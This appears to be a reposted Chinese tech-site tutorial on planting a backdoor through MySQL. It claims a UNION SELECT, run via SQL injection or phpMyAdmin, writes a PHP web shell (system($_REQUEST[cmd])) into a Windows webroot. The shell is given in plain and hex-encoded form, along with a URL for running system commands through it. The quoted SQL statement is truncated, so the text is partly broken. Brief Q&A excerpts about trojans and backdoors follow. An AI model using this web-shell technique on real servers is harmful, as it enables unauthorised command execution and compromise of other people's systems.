欢迎您访问我爱IT技术网,今天小编为你分享的编程技术是:【运用Mysql语句生成后门木马的具体方法】,下面是详细的分享!
运用Mysql语句生成后门木马的具体方法
通过Mysql 的语句生成后门木马的方法:
| 以下为引用的内容: SELECT * FROM `vbb_strikes` WHERE 1 union select |
通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:
2 3 <?php system($_REQUEST[cmd]);?>
再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就可以执行系统DOS命令!
问:那串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么?
答:就是下面代码中的十六进制编码,
<?php system($_REQUEST[cmd]);?>
如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!
以上所分享的是关于运用Mysql语句生成后门木马的具体方法,下面是编辑为你推荐的有价值的用户互动:
相关问题:木马和后门的区别
答:后门 当一个训练有素的程序员设计一个功能较复杂的软件时,都习惯于先将整个软件分割为若干模块,然后再对各模块单独设计、调试,而后门则是一个模块的秘密入口。在程序开发期间,后门的存在是为了便于测试、更改和增强模块的功能。当然,程序员... >>详细
相关问题:木马后门是什么 。
答:你好,后门木马简单点说就是隐蔽性很高的木马。比如灰鸽子。后门木马就是一种由原作者在编写的木马设置了一个后门程序,比如按6下shift就弹出权限设置,这种快捷键一般只有原作者才知道的,然后原作者把这种木马卖出,比如你买了他的木马并且使... >>详细
相关问题:怎样防御木马后门
答:木马后门就是后门木马,就是隐藏自己进行破坏的木马,防御他和防御一般木马一样。 木马查杀(查杀软件很多,有些病毒软件都能杀木马) 防火墙(分硬件和软件)家里面的就用软件好了 如果是公司或其他地方就硬件和软件一起用 基本能防御大部分木... >>详细
- 评论列表(网友评论仅供网友表达个人看法,并不表明本站同意其观点或证实其描述)
-